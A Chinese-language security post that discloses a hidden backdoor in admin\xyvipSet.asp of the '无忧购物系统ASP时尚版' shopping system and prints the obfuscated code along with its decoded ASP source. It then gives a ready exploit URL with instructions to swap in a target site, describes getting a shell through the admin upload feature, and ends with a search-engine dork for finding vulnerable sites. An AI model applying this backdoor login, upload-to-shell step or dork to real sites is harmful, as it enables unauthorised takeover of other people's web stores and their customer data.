无忧购物系统ASP时尚版存在后门，可直接登录拿shell，这后门不知道是本来就有还是另外别人添加的，以前的版本有没有这后门，我倒是没注意了

下载地址：以下两个地址下载的都有后门存在，其他网站的就没有看了

http://down.admin5.com/asp/3090.html  

http://www.onlinedown.net/soft/85106.htm

后门存在文件：admin\xyvipSet.asp

前些天没事干，刚好看到"无忧购物系统ASP时尚版 V2011.1.19"，这个版本貌似是新出来的，以前的版本我有看过，漏洞不少，这个版本呢？

刚好今天有时间，就下载过来看了下，没想到漏洞还没找到，后门倒是发现了一个，晕了，漏洞不找也罢，这么大的后门存在，还有什么好找的。。。

在xyvipSet.asp文件中，有一处地方加密了，我就奇怪了，整个程序都没加密，就这地方加密了，有什么奥妙？

“#@~^iQAAAA==@#@&kW,D ;E /DcJmmOkKxEb{Jhm% Z!%r~Ot x@#@&d+ddbWU`rCNskUE*'JACN T!RE@#@&d /kkW `rWVmoE#{F@#@&M+/aGxk+R"n[kM+1Y~JrU9+aRmdwr@#@&n NPrW@#@&pCYAAA==^#~@”

解密了一下，明文出来了

if request("action")="waj2008" then
session("admin")="waj2008"
session("flag")=1
response.Redirect "index.asp"
end if

汗，好嚣张的后门啊

利用方式：http://www.hackqing.com/admin/xyvipset.asp?action=waj2008

把www.hackqing.com替换成你的目标网站即可

进入后台的话，利用上传就可以拿shell了。

inurl:style/info/domain.asp intext:.com

by  流浪的风